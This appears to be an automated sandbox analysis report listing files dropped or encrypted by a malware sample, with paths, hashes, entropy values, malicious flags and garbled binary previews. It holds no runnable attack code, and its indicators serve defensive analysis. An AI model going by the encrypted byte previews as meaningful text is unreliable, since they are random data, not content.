                                                                                                      Preview:Ej..D.<7.~=~..}.U...2..w.....1Jr'...'U..O...c..../;h?....#ra......].Qn.g.. D...r^.q4..[......A..Y.M9L.Z......B.b....^$'.o.s].bx....c+.[s..K..g... Z..or...|..IUt.r3.2l!..l....{G......\C....3b.XuL...pSueC.....2m.[&..*.%.X..9:..=(g...].E....a)..Lx]Rq.o.v_....U.......n@...T..!..=.....f.4...." ../..D...L..A.W.B.Y(....iN..G......O.......U..d.FF. $V!..H.U...u.c|.F"..K..j..b..^:."..\....%...j...L.`K...y!.Y._V.gfX.y.z..lw.<...B....).......;.....s.?a._..yS.\Ate@.w.](...kAo.}oG...qZ...w.....\Tg/v..../..j.`.k.T(p.[E.}.UN...o..m,?.^..X.L...Sf.5^..._q.M_..h`.9......'4#L}H...>.$...L.H9......-...5H.C..3....Y................Y...../1/.WO.).H.pC.+*...H\..|.S....d.c=......)>..8....wI..f5.He-.2.f...*...(@.v..R....E(c./..2../....xk.0.p#.TO.S..e.....(.x.....d....K....X...>....F.w.... ..1..L=4j.F._.....]>J+.f.-....O..........C9.&.....K.{...S...r{...U......9.H..)...+....G.ts>+...N....2ek...6....g..,V....8...1......%l..m....n........=Qp........,..ReQ.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):105937
                                                                                                      Entropy (8bit):7.998480890701957
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:5UHEyh7C4s7k7o2zRXOD7cHGOtQTv5Es8zqkeDwxwqSw4xQXaptOgzShX5pJndPC:SAgt+MmOtQTv6mkb6pBFtOgzShX57d/i
                                                                                                      MD5:457F650A1260D91B1A2CA684FEB94A55
                                                                                                      SHA1:DD39F2BF73FA3497495FF9DC6A1FB93C34B76206
                                                                                                      SHA-256:56ADA2698CBA79F2BB03CE6C4683F23EC7FDE57EB85A176C4B79580A6C50757F
                                                                                                      SHA-512:4D943461E4E6078F5E3D768C9562DB616AF46813976875EC4625DD37FF466412606D9CBCB21F62A8B45B9C93952E294A39BA4BEC368546B3C6FCD7CE7B818A9F
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy.wm.....Jm..*/...g..v...].mG....:....ngE...qc..#%"..2..H.......T.A....m.ZR.U.G...w.@.'U..[..Z.s..I&...M.T.......}6...d.%.>ht..,5.7.....l.,Pw:.....h..@AMv&7....Y.R..|.x.S.YH..ZBi../!w.....jv.......t......k..y....v.'..R^..@p.).}..4.O..I......Y...b$x......@..gO..9..@.g..:.p.G.2.U.P.\.s..<....:.M.[g.9O.....$......^0..g....s.......P1.......nH..A.....k.!...~.........A.VF0em..*.2/......N:y8.B/..[^k#... .i.&........3o.."...f.'.{.H/.......F.X:9..{......@@..1u4.pBc.h..5}.Blm.z..24yq@..;g..xv.P.;[Y.?\`...[L!."/A....O...x...c.:5t.B.a.).*8.tR...z.f..&Qw..t.b..*.Z./....3..q.k..R.........y.sT.......M.rG.D.N...*.F.......<E..z.{....al..."....q."cO._._.S....7...P@2.d:.M.>.......d.)9....h..D7.....=.^).&|.;...}C.VjGX.,../..5.CGO....r0..|G...d......huvs^|^..'..,%..W`.(....,n.........==.g.."w(.I... k.:(...........-..o..p.~y....!d.#..S.7..LH......Uf...oU....|.2.rt..Q...R.Zu.....a.........^.....l...a..w....2;.(.t+..../...1.e.....~...m0I...P..q.y......@.a..@.[

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):105937
                                                                                                      Entropy (8bit):7.998010121511639
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:6dPbeTNR1uXxJwQsiIz4egXIrpEkTodTLdn4DF4U:6dPyhM6QsKegXICFJ4DFf
                                                                                                      MD5:E16E7C66418902F62097CE841F39960F
                                                                                                      SHA1:F4DB84F7845FA7EB3E882EFAF7250AE3797ED0D7
                                                                                                      SHA-256:5C6B48E1030F9A267EB8788BD4201883D52295648E81983B66C680AB724C6589
                                                                                                      SHA-512:A9F2CAFC580E22F611D73CE9B914486D003FA700F18EBA22CAF69AAF96FC852C08DC88926697B7B9EBF3BDB4D0C0858BD3C1FF46ABF4115AA55EB6A5F75D1EA1
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy..J/.....h{dm...DfF...e.%%.Y.EXT.s.1._..{....f4..J.=..d0.d...7.VY...P..NO..(F....&......_0C..x$.W..%aP.%.>..)..s.p.....07Z...x........@|6..D..?....5...6A...~IH..R7{.3b.T+N..#f...O.Mh.k.r.a<...k.9h.W. .J. sji.`[]......6..XmM..J.>.t....d.c.). .P.Yq......j..6.W...l...&"=.?....o....oc.ms..k..V......a<k...5.:.u1Y.\...HHq]j...w4..O.*.(..........?............".......JX.*....^<4[..s.'.%..bTuSA..'..."N..=.......".p...m@j.`.<..g..Q.........&.....$.}..3...V..s....tm..^...e#q4.o.H.....s...%6.`.).........U.....s.......f.B.z..5..oW_...8..q....L..Yc`[....(.1.vP-T:}...... .|_/\.\.!..e./...dhB...o.'V....U...6,....'\..K..r.....O....5........<.2;.#V?.k._...Kbc.Z.4..r......wE.o.l....O.....>..9..q...dw......U.;I..^.T]+.X..[Q...PE.4.....q...NS.z..a.\s.;".".....4......5.O..a@K...;'8.B`k...@.-b..].0./.2.5B}........Td...p.C..xBj..\SqY".??+.T.T.......U.)/....E..._ .|h.F..K....;}h4.ljj1.h.u...(......,.K.x.h.......D.6.^K..%.O..:...g(S.4' ..u.B..t.%P..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):118527
                                                                                                      Entropy (8bit):7.998612076867134
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:hy+4L5T/QvbR57ch0ANgk81KiU9LO8K68Sq2GL6h:L4JQvbi0ANgkLLT9zq2o6h
                                                                                                      MD5:6A826019E887491733E707714E60B653
                                                                                                      SHA1:C5808E75DBE28DD1DE723371BEA258FF2D14D117
                                                                                                      SHA-256:7552153B5380E5AADD217A1B4020BD3065DC70A6297449A306EA5B8CFFE9E3F9
                                                                                                      SHA-512:2F973E009296E83BDE52FB18B8BC11EF293F8F6BC881583BAD4031A1996D7CD192C1286F772943E68E7E3722BBD1A1C8A186EC9D60458732F023889B6E9D6E98
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Syn...&?!.._.3...._.../.....D(.v/...b..wt..[.../.p..B.y...Y.f)..3.`.#;]B-.F<.~_..H%....#.y....5.A...)...d.n..O.&S]_..."k`NX....s.x...o..[W..,.z....Y^....d....). .R...D..u.$.H.0.Ov..GzC...n....u9..q.9....U.2...p.,J...s..:.x..Hp...M.2.O.gby.D.!..].........vPW.n....>p..<m1.KJ.M.j..?-.*.....C7.....v.Ut.....Q...N.9.S"..9.6..X*#.X...........P.H....b.s..K.[..qIY?..ZY...Y..9.!xN..7]....r....n.|.....'.....!:..y&F..-.S......v.. .2.S..*F..g$.3.Y...6.e...$.....}....b. 7.o...4..X...g#.p...y......K#...RO.B^.W8...y....j.Q....3.`,.n4..dw...G.:....?8...1^.!.F...e..7}...k.8.L.....}#.*Qz_<GC..A..]..Q...8M:.0.Y.....5..X..I.AW...R........NY..e..8....^.*,[...Rf. {..+[.......c<.i..Jg.d3W.(.....(.1.,.....Bg.....N......!p.,.........n*$..$...',......63m.!.GO..+...G........}..0......M.j.Dz.... .R..%.....W.ad.<Q]..=;.^xnx.K..uY.\..^Qp.&...........9..m.a:...t.j.J.K..X<.......%.r..y.0..C.-..4...:...g.(..Si...V.;.#J .......+.dX5..x.W...j..o(%......X.../...)x

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):118527
                                                                                                      Entropy (8bit):7.998597464216997
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:3ddA7XnHiz7AXpJI9tTf2Nuo+bj2sUXCvTW8:3MHiz7KTPw+sUCW8
                                                                                                      MD5:4B0D243116A91086AF50DE7A29502128
                                                                                                      SHA1:3E0E28B5FAE60FE7A30E8EC21EF0D9E8249E8188
                                                                                                      SHA-256:BE43F77EB87E03D554DC80D6688B51D994213A841D588D3FAC5A8F3A6B3E65D5
                                                                                                      SHA-512:F23505720DB1FAE059E5D554449B75C5167AA02FA1485657824AF7575EB9EBDD42E1D86B75B3ED7388A0E646B08F2C14BED519EF22FD13073984CA6A4A6B00A1
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy .....n....H?..{Y....u.....o.:.......W.......H9..@"..{.z...]S.i.....J..%5i.]P.NM...<....G.S. ...9/=..#F.Alx...3y.)v...~...N.&&....LO..;..t/.G.2.S..FZ!..u.+....g..G...#.I..0.x.......8.....i..|..^.~VH..+../9PU..j....x(3c.m..^...D.op.....fl..nA3o.....sb...Q.;0.X..b..m..T.K...U01..5...$..&..=...;..V.@g....K0...qx.5#....q..b.0...T.....qi.&]h.\S..69.=...c...1..Zqm.HtFV.j.9.0K.`d.....~'..s@..O..,._.."...U.Fm.{.....h........R.W.d...!4..d.$......X..~.z...{S.c..h..&.....~.~....B.\..C37qi[-../H....@.eYW..i.w.......O....C..Zx...<:.jL.h .W...".....D./....g_&w}m...`C=x...u.kf.\..G!.W.....M.%...6...!...5.h.Al.k....i.o...j.R..C`...K.T#.]../P\.UFd.7....sg.&....E.w.L+.s.....U.G58..^.>...$...M.3...h...H..'p.K....ND.%.......We>{..".x.4.F$f."..N.y.)BC.M.Z...c..%....c.%..=%...."...N..2..2..A..K....`..&>...O.kR.......\n......T...#.B.z....I..9}#.5!..W\!Y...].A.d.\Xm..1+.....Q/L.:r.[^..S%......5Fy)A.ch...TV...#[.....J..;[..K.zd2|yc...Z...LS......<

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):118527
                                                                                                      Entropy (8bit):7.9987387920699975
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:wxqbBVpjDbMtYcoChlOws6Yd7OycpY6zPX8oZEpKA2SRK:w6BVpjDbbcLhEF6k5R6zPX8CEQA2Sg
                                                                                                      MD5:561213EBD903053EBBCC4EA59FCFCCC2
                                                                                                      SHA1:3B7678965D03FA9D85881C4BA709C83E5F4D0AAA
                                                                                                      SHA-256:F88CED8D216E51768D7F525F6273FE210AD36CC71974865B85912BC83C6F2631
                                                                                                      SHA-512:89D7B806CE9CDB2FCBA5670B2F6355C2001F851920AB7FE719BD139BFCA15F290F3DA4E91F80F15132C8F3DCCC2E7726E9B7E05D9FD7732B8BA4266D2B154CDF
                                                                                                      Malicious:true
                                                                                                      Preview:[{"SyU;W{....t.7..*v..{.y...s.f.f.Pvg ./.[..!v....jx.\?!x.2q...G9.$..BA...S.W..|^.d/.....Q.2..^8....D...@..3..T.+K.?3!.A;..........8..1....)m..sP.&..-..R.p .,5.I..l......`.r.V.U..a.t.v.9.vW..'l}M....Z.)1{(A.t.d....g......y..m.]U.I......O.`.EQ......6..K...).s. ..Ja.$J.#.y......7.. [9.c\Hr.....'....e(8...i| ...|ZvPt...?..5..Y[.........xK&..d+..|......m.m..h.[..xt..w..S..3....... ..kK.k.W.dY....m..(.9.m.E..C..?.4..R$h...s.....0.'..7....m..#..|I;.=. ..+-..x<.X>iY.....+..lT.2.DV!..+..x.< ..0>^...e.V.kw.r..U..h.|.4.R<U...g.....[l....v.l.n.rFHN..b.._..f....`'.E.0..0.:.-........*....DA..w....*...(=D?.W..%@...m.<.R..oE.>%.L..[..u...$./.V/...[(|.G..O.....'I..C0M..L6...w...F.....A....G..B..U$v.:w+.e.A.k.....s..f<..4OU...n.VN.......>..xo.M..}........].....;.;`...}..Mf}.o..d?Y.D.k......i..;(..>...|^^...Z}....?.....}...%.|.&._"..W(m*.hyG.'.)2s..u..}X.^...u....O;...#.Aw.8.B.M..{.3w.j..H.W..b.....ra..I..C.v..a...:..V...&../.....+.....j.\..c/.K,77..%^

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):117246
                                                                                                      Entropy (8bit):7.998345889680197
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:3yfH95Iwd7nCNKC+Q01s5FSsAz3ce2C93t:3Yd59d7nUuXnIe2od
                                                                                                      MD5:9D82174D4263731945BBCDAF8944B84F
                                                                                                      SHA1:EC78844A9CFEE8D0AB228BB015451C187EC74F00
                                                                                                      SHA-256:93C4E7B3DB715F8459D80E6549EA2153E8917872387C0F73E25E5DDEC9E86A1A
                                                                                                      SHA-512:F3E70FE320E253422992A19CF1D8AD791AE151C2163418E213D6D9E4DB58FC06466FAA06D1563575743AF53AA223469FA87C622E9CD30BE39142248A4C7EDFD2
                                                                                                      Malicious:true
                                                                                                      Preview:[{"SyE...l..n."....0....s...i.4m..t......}x..x......Bf.G.D..72I.....J)..d[..`....@+...o..A....Qq..e..;..C*..w.e..+.Cp.r..-.C....~..O..j.i.7...}..xr..I.%...V...E.vL;..v..-...O.cz.....E....<.V...Hu8H..'y?.c.v..t...Y.Zf..-.D..,.pFs.E......:..'JWav......[H.$..u7d..PT5....9.........6.I........:..I...D...U.@..U.o.:I...b.?.U...:...CP.9?.:;".M.KG.....@....n...:Z.f.*.l...0...s.....M.XN.....M0...V.e..6]..>..oXI..G>cm[QS.k...t....:o...98`.....X.......HIp..w0.e...=..VS.=......$h..0.....U.Im..._...'bp...`.7...?..Nmh.?...g...-.. .HY.`g..K.P..l.h.j...7F...MBD[....;E@..=oax.b.....Y...O....8Y....JY....'.......F....aF.k.@..,o.............AE.....uZ"...2[m.%V..(...~..5.._....0J....G.a.R...Khy.....}R...tK.Q2...V...0......-..#.H7.1J..H4_.........1hScs..3..(..\..3c....Q$e..l.q..9....O0jj.b.w..W....I3.P..x7....q..N.D..1...;.....s..?6...{.5......o,.."..I...wlG.R.g.z..*...a.........X...U......,?]..=`.^M.|./...4LBNh......$.j.>..J^.\...J...d..v\g.".<.).....6.2.....4.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):116817
                                                                                                      Entropy (8bit):7.998404449638444
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:DjFpznIMWhYgAKEb+0P9qL3IU9hN1JxKyTRFm00FW:Tn/EvA5bzw3IwhzJxjFmBW
                                                                                                      MD5:59F42404952E492683F18C68B434BE64
                                                                                                      SHA1:79F71A3B2A572E410248871EBA3A35F7A55DC76C
                                                                                                      SHA-256:98667E8E8BBA914EE5B79C5286D1F88D7A7BFDC62F1D50FE1F12866878904C37
                                                                                                      SHA-512:7D7C370B93947302A834B47FEB97AD45D41E17679B61E32C3454E3B3BF02109FDBFB2F55D8448E5125B437F9A2748A5DE49E8F91F0CBADA7EE7B76879DF1DD5A
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy...8...:.k.8il......;..0....cf:.U.<n.@.@..)yc.."....+..q-v.r.<M`.....1..~.C.`.+55H.U.......t@.e.G..YL6.)..C..i...I..y.....Cv.n...4...D.... l.i... }..N.."wg.U....Z6...T...<.}..o\.}O1.$.x..,d.O../..{..X.t.%25S..b...R{.;*...n...*a..I5[.....}.1.....D.......)o#...:.Bm#._@........&{b.R.....H.d~S1`......Y)..c..}.nx..]$[.O....78LL..G69N.<..b.........<7n..FW....U5...!i;!.4.D.un.6.Z...CvI.$?.o......S.`.Dg.{9D0.T.E.r..<....\...._....C.. .l.[.."Q....n.............+:.<.;l?.;.9.?P............i~.'..4.\..)...n...g.G...An..'..DGi...b.L.Y 7.&m..............T...=r...D....S7..s..}"3...[.....3L....}\. .5Y,....I..3....&3;..j.jv.n...5>4x......+..F.d.u@Q.K..X.]e..M.i.%.*.p....K.K...~t.3........r.v..>...N.......@..]S4...7.....i96.A..nU....#"..D.{...C..}......8~.....T]S.j..r......G.g!YI...zYH..!...*r...._.y..........Qg}.3.i..20.)..../..f..B..R.\.u.n.&tf.Wj...m...~.F.p..,$(%#...U.3.8?93.......0..}...5.z8.C.Q.kKM@<.......Cydli!r..uY.:.F>...~]...z.@

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945529675005.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):115275
                                                                                                      Entropy (8bit):7.998336271899985
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:0pFRQOV6rgK63glh4nVMc2U3S32P+kQdEOUCNvc7CUz:cKOV6rHhlhnc3i3tRdEOJcV
                                                                                                      MD5:08E004AE87525C9C57F87B6C5977D998
                                                                                                      SHA1:2F69CDF1E9C5C7FCA798230E042DA8346A644C47
                                                                                                      SHA-256:54828BB96BB68CF839145BE5F468BF24E098A8AE0E7DD3B922C5BEE2739773C7
                                                                                                      SHA-512:468677F047659ED2B2E84D4AFBE9F6C5149E249CA085882185CED8DD8BD9151DADCAC1E0344A4BE4EC4642A0F7C8F1D26AAD5A3A0B9E3DBFB6F5D73EFC680218
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy.SY.K..d.=k)SNv].......@...xUR.Q..TN&.l....q...b.#..)......M....G2.m..F...e]P..'%.c..Y..v..x..8...%.'.(.z;J.dx.....+!.<.....1.m9[....M..3T..9..w'.M.g..p!.u....mm.R....,U)e.G.n.B..D|.lS.+.7CJ.1_{..|x.v.pk."*.......@m..U..>..i...K..hhk....iz..x.0...D.......2z..|. .ZI.8B../V6......R..2r[..T.&..1.k...0d.<.@.&_kxO%}.....Y..x..l.z.rcWup...>.!jV....O...;F4.. ..6....}.I.:3..j.O.C?.yM.O>~.b.,i"`0......P....^..hY..5.e.....-...".,h8d.T././.7....M3.s...:.^1.Hs.};9(.P.}..d......g..W..2=.9....#..3k..mPR...M.....};.Z..D..6.H....#=..i0ok...?d!.y.X..N.., .)#.....(R..._....j2]E5......+.2B..W...^xH.T1K#..l..F.'yA.....p.......p.._0Gv{.Fx..K..,...4m...fjht.z.;Z.N......[3.Q.:.6...9F...&..L8.....RiZM}........4..F..k...T`.....%..k7N....a.....h...%r..y........=....K...[.Kc#f.G..=...c|...=.e.".t....&.@.Y?E&......e.].YE2..{..P..."..q.......S.....wW.w.k.......3.......U...W..xr..=s.....".R[.7..C.q...2..JU...o+.%.?:.R...&j.0.{..n.2..._.#w.EP...PH..a.`n....A.!+.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133521717815553933.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):115275
                                                                                                      Entropy (8bit):7.998289513984992
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:pQnPL4IecK9z0sEka5CVbWFGfk94jfqu3yTXMYa7ebKgt21UUxrxvDan:pC0IecKZREkaw7sujCu3y+5tuUZxan
                                                                                                      MD5:7CD13B9FA23FE856A90144CDA1BB176F
                                                                                                      SHA1:1111878D3D35C151371A5DEAEC4F49B21ABB817D
                                                                                                      SHA-256:38190117CB23D2AFAC6CC651BCD4C1344D88222E31704F5F6CFE7E1F6D599ADE
                                                                                                      SHA-512:3FBA9649FD777F4F41A79C89D6D4E7E1020AEA7C0E509B0EC79CF6779AC54510B16D5C2BBDE2F9F55B2DCAE4E2CBA5F7D8515F9A32D6322AB841649521FCE094
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy.].d<..Kj......=.-)..p......j...n....a.P.(.nY7....hkz.[Bw.LH.......w...!7.L...Hg."R(...#.Y3..q/...\.. .rNJ9...u:......fQ4......).:."|...U..Q@.'6.vqX..Us...Q.A.r.i.px,8.u..........i...+!....D.....;.i....Z..B...ly6...@.WI.U....~OK0..5<H)..R)#N^......t.@..4.t..5......v..Q.q...7.a.....hO.......Va.f.b..A>.z..BP.5..^tN9.q;=Z.....n......q+.a...DU..r.......~...T.u....'...b..^.f=..7..........Nu..y.....0.c..d`E.Z..|...$.K..b......2......C...../9bs....6.{....q..5.}..%48Q....w..3....MS.H...LG...@.....j.*..*.K...a.m..y...s.z:........X..}%..:bK.e&H...^.a.1..q....*.[..i..L.*.1../e.+H..v........w.....e.).........G#4O.....&....e.....\.?..(..K..[..@.`$..q...WS.......L'B'......>b"0......*.=.W.#'.,9N.@..&^..9Yu...I.'........c .$j...L..a.]..:/......M..O...........?..Ih......:.....~B:n..H..{...3..2ML`..])..^.S.w.I.....4.......Oz...]...H..=E...}..%..?7..3"..B...*.jW.}...a.J.i.H.N.....p...k.X.-.8..c[xo.Dez>....\..)fC..V0y...T..k......c...d% ......>3.&4*.<.wG

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):696930
                                                                                                      Entropy (8bit):6.209217080478831
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:ZEIFY/kGDBKPhvboGotdYuMOCc5MpzgroTDLga:ZEV/k22hb1uMOCc5MpzgroTDLP
                                                                                                      MD5:0B014214C1B30EF80D0A2E11607687A4
                                                                                                      SHA1:B8F73B0C8F781BB86F8B0338CCDE1C829F4F21EF
                                                                                                      SHA-256:742A50E29EBD8C2C908795A1BDFBDD70835C6596359E4FC534E8241AC7D996AC
                                                                                                      SHA-512:F8D39E293C5C8A5000243A88C804108A1551BB2308D4BA8193C2210E3472178619BDF57760F6AA6D0C0CF3C4F8FF20ED055AB38073E0E30E4F175A431B2E5ACF
                                                                                                      Malicious:true
                                                                                                      Preview:[{"Sy.P_F}.c.....6....#...-p...c..e....Z.].....<.....>..^8.v....m..RPqg.M..~e%...y..!........F..JU<..{...1.=....56...n|V...#z...Il.......2....TP.x..+.....@).E....[..A...........j....S.y.cO. ....8.=..r.+..>0.7..1.1.v....5b_....V...s...&b:e1...".1.g}M....).U....z...&u6.CA).....1RM.%.....eU}mdV#3..+.!.....E.#..\.D.e.....]...M./.F.Z..)(C..x...IZ.:>...>./p.ZQ...>b.E.u.N^..g.A......]......W.D.4..6"..o...t.Z.....'O.0..b ~.......?.b..`..(#K<kc.....N..hG6-h....bS...x.3Wq.iP.x....,...s.X..Y....{"q.C.....a....Y.....nd.qt ..oK.+f.^.&Eo.p......V.1.B..k.1!N...\....p..X.....0.=Cr..q..t....|....gPn.f...I...v.s..f0.7..G.QLv.....+..Z.E.C..;E."i..-.d....{.@/0C=...v#......u..BR+sW...K`.0...n.X...r.....]Zl.'...........|r.:E.....K.....)...p...p...tG.I...?...BW.~..T..1e. ...!}U..Z..C./..;.n......4U..Vv.t.p.c.7N..Q...R{/..-.I...qE...bV.1.r.^..=..{...........&+.~...].gF.j.py..!):Zv ... [*.%....5..Z. .)qS.~.U...zgH/.y#....-...@(y,*..\...%cQ..^.Ds.;.3_.....o..6d1.p.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7458
                                                                                                      Entropy (8bit):7.972770363805747
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:5xXw9dBrs2OYr3mG/JaSsk7QxrESkZhUAVmDDpyoK:LXsBI2jr3mG/JaSskMKZBV2pyJ
                                                                                                      MD5:C5F5F91624337DD6AAD3003F7AB68F7F
                                                                                                      SHA1:82974EADF0A93FD6823BF251B7FE86F57C87551D
                                                                                                      SHA-256:5F6D37255B5C576E020A090B3F1138CB62D9B10A3C23AE854C9B97B2562BCD8B
                                                                                                      SHA-512:8719B5E4B735C1134BF79CFB0BE46692A85F9B36066B3717A9E962BCC186379F5DB79E22D83B37C4C9A2618D60BB9B24685B9F530D63B7A61861EEA88D9D62CD
                                                                                                      Malicious:false
                                                                                                      Preview:<svg .)"N.^...??.P/{.../.u.KK....*0...K.4x..n..E.A.{....*...E..W.......b+..)....~.......NUy.(.P*C7.....Gg..MU....B%2.x'.W.6d.#..4...Bp.0!-..B.....9.i1?.\..qmWM....l+.......~....n...........D..jq0..X.x....,2.@..W.v%^ 2...2@..&...z.....*p...G.N.x.....1...HLtE....riG.m5..j..-..g.z'/d..>H.......{.......~....{.....5,..4,2..a.@..U.-.....!?.....iLr...p...J.QBc.'.N..rdO....N.H'\.^.#.Nj/... .!...Y....?.6.W."G..P.}..\..t.........J.........JAp{H"`.Y#....0.Z..._.dF..}.=!^.........8.a'.R=..$k....^i..........#.m.H....#.8qjPkb....{.Z4...-i.7.#.j......(>....D.x9...s.p|I.[:....w...W....a..5..&.........n....{..m...#Yv.PprX.pL........%..5..3..;s..b.t....w..mJ)......b...]....7F.$.1 .HN%.e"...H..-...x.%).).-.....%|q+). ..........8..Z..>.LC.M..c....3.B......5w!.jg=J.Y."c...Ob.D.....Z..i0..t.D.M..0...B`......*3...[.....%.`>.?%[.....Cn..J..iN.....^T..#..@`R..mv.....Vt.V....8.......1.. :W.a.q.V......{,.I...ph.......D.U..`.;_......O,..1.Y.LL......v...V.1['&.k....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6854
                                                                                                      Entropy (8bit):7.972661728630513
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Qi49xGkdIebaZKim7YUUQxotHSyRqa37S4CRAnSFZ6sdQudsh1uCLu+sEGADxPBI:AGSMKim7YUhxMAen472WWMx1A8gMr
                                                                                                      MD5:9A081CFB23A63E58B1ED07C4FC44E868
                                                                                                      SHA1:6B75CFF531E39E93CDF6104E40217671C886B2F2
                                                                                                      SHA-256:41D22E9EEA47B99A54FCBB0FAA11632180F3CC441308294C5951AAEE3907638C
                                                                                                      SHA-512:24EA9AC2C44F80A1A7BC82F73220C30CBFD226E66C2D6507655439173077E0ABBE87FA135E023AFC7B21D1A934AFD33D7A850AC7FCD91D3E956CF4DF82EF7AAD
                                                                                                      Malicious:false
